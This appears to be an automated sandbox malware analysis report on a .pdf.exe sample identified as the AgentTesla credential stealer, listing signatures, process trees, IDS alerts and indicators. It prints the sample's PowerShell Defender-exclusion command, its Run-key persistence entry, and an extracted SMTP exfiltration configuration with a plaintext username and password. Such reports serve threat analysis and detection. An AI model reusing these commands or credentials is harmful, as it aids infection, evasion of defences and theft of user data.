
Windows Analysis Report
26.09 01.10.2024Fiyat Listesi.pdf.exe

Overview

General Information

Sample name: 26.09 01.10.2024Fiyat Listesi.pdf.exe
Analysis ID: 1519324
MD5: 5b35e1e6cdf0d5277fa8dccd5fc06d26
SHA1: ae1f7a5ece26c423477fbb6048db707df4013cb6
SHA256: f7d4eed71f2bdb8ac845990506c335bb64af5877df1925794b000d4a7cf88b84
Tags: exe, user-threatcat_ch

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 26.09 01.10.2024Fiyat Listesi.pdf.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe" MD5: 5B35E1E6CDF0D5277FA8DCCD5FC06D26)
    • powershell.exe (PID: 7780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ctsdvwT.exe (PID: 8136 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 5B35E1E6CDF0D5277FA8DCCD5FC06D26)
    • ctsdvwT.exe (PID: 7172 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 5B35E1E6CDF0D5277FA8DCCD5FC06D26)
    • ctsdvwT.exe (PID: 7196 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 5B35E1E6CDF0D5277FA8DCCD5FC06D26)
    • ctsdvwT.exe (PID: 7216 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 5B35E1E6CDF0D5277FA8DCCD5FC06D26)
  • ctsdvwT.exe (PID: 3264 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 5B35E1E6CDF0D5277FA8DCCD5FC06D26)
    • ctsdvwT.exe (PID: 3260 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 5B35E1E6CDF0D5277FA8DCCD5FC06D26)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted malware configuration: {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.musabody.com", "Username": "victoria@musabody.com", "Password": "MUSAbody_victoria2018"}
Yara matches on memory dumps (5 of 10 entries shown):

Source | Rule | Description | Author
00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.1894805275.0000000003171000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000B.00000002.4141088444.0000000002F2B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Yara matches on unpacked PE files (5 of 10 entries shown):

Source | Rule | Description | Author
8.2.ctsdvwT.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
8.2.ctsdvwT.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
8.2.ctsdvwT.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  Matched strings:
  • 0x336c8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3373a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x337c4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33856:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x338c0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33932:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x339c8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x33a58:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine: "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, NewProcessName: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, OriginalFileName: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", ProcessId: 7620, ProcessName: 26.09 01.10.2024Fiyat Listesi.pdf.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", ParentImage: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, ParentProcessId: 7620, ParentProcessName: 26.09 01.10.2024Fiyat Listesi.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", ProcessId: 7780, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, ProcessId: 7788, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctsdvwT
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", ParentImage: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, ParentProcessId: 7620, ParentProcessName: 26.09 01.10.2024Fiyat Listesi.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", ProcessId: 7780, ProcessName: powershell.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 108.167.140.123, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, Initiated: true, ProcessId: 7788, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 63219
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", ParentImage: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe, ParentProcessId: 7620, ParentProcessName: 26.09 01.10.2024Fiyat Listesi.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe", ProcessId: 7780, ProcessName: powershell.exe

Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-26T11:26:17.627129+0200 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.4 | 63220 | 108.167.140.123 | 587 | TCP
2024-09-26T11:24:39.741265+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 63220 | 108.167.140.123 | 587 | TCP
2024-09-26T11:26:17.627129+0200 | 2839723 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63220 | 108.167.140.123 | 587 | TCP
2024-09-26T11:26:17.627129+0200 | 2840032 | 1 | A Network Trojan was detected | 192.168.2.4 | 63220 | 108.167.140.123 | 587 | TCP


AV Detection

Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.musabody.com", "Username": "victoria@musabody.com", "Password": "MUSAbody_victoria2018"}
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; ReversingLabs: Detection: 28%
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe; ReversingLabs: Detection: 28%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Joe Sandbox ML: detected
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe; Joe Sandbox ML: detected
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: oAlZ.pdbSHA2560 source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, ctsdvwT.exe.3.dr
Source: Binary string: oAlZ.pdb source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, ctsdvwT.exe.3.dr
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe; Code function: 4x nop then jmp 07981045h 0_2_07981577
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Code function: 4x nop then jmp 076E0D5Dh 5_2_076E128F
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Code function: 4x nop then jmp 076E0D5Dh 5_2_076E159A
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Code function: 4x nop then jmp 07090D5Dh 10_2_0709128F

Networking

Source: Network traffic; Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:63220 -> 108.167.140.123:587
Source: Network traffic; Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:63220 -> 108.167.140.123:587
Source: Network traffic; Suricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.4:63220 -> 108.167.140.123:587
Source: Network traffic; Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:63220 -> 108.167.140.123:587
Source: global traffic; TCP traffic: 192.168.2.4:63219 -> 108.167.140.123:587
Source: Joe Sandbox View; IP Address: 108.167.140.123
Source: Joe Sandbox View; ASN Name: UNIFIEDLAYER-AS-1US
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: mail.musabody.com
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002A09000.00000004.00000800.00020000.00000000.sdmp, 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002A15000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://mail.musabody.com
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1705109897.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1830841149.0000000003167000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1913937997.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://account.dyn.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, POq2Ux.cs; .Net Code: _4H57oeN1J
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.raw.unpack, POq2Ux.cs; .Net Code: _4H57oeN1J
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe; Code function: 3_2_0569EE20 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0569FC90,00000000,00000000 3_2_0569EE20 (idHook 0x0D is WH_KEYBOARD_LL, a low-level keyboard hook)
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe; Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe; Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: initial sample; Static PE information: Filename: 26.09 01.10.2024Fiyat Listesi.pdf.exe
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000000.1666699317.0000000001060000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameoAlZ.exeD vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708918673.0000000007C30000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1704110218.000000000165E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename24eacbb4-825a-4768-ad59-21c6c6ffb60d.exe4 vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1705533859.0000000004605000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1705109897.00000000033E7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename24eacbb4-825a-4768-ad59-21c6c6ffb60d.exe4 vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4134637455.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe | Binary or memory string: OriginalFilenameoAlZ.exeD vs 26.09 01.10.2024Fiyat Listesi.pdf.exe
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers)
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers)
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers)
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers)
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers)
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ctsdvwT.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, ZTFEpdjP8zw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, WnRNxU.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, 2njIk.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, I5ElxL.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, QQSiOsa4hPS.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, FdHU4eb83Z7.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, 3VzYbXLJt4.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, 3VzYbXLJt4.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, 3VzYbXLJt4.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, 3VzYbXLJt4.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, GfC7QCCjIwYVW1JcP5.cs | Security API names: _0020.SetAccessControl
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, GfC7QCCjIwYVW1JcP5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, GfC7QCCjIwYVW1JcP5.cs | Security API names: _0020.AddAccessRule
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, GfC7QCCjIwYVW1JcP5.cs | Security API names: _0020.SetAccessControl
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, GfC7QCCjIwYVW1JcP5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, GfC7QCCjIwYVW1JcP5.cs | Security API names: _0020.AddAccessRule
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, jvk3pjvyguvOKtNTem.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, jvk3pjvyguvOKtNTem.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@16/9@1/1
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\26.09 01.10.2024Fiyat Listesi.pdf.exe.log
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Mutant created: \Sessions\1\BaseNamedObjects\DBKvNAWttOuDYjyLzkXI
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dsa5nlh.01c.ps1
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.1894805275.0000000003250000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000B.00000002.4141088444.0000000003000000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
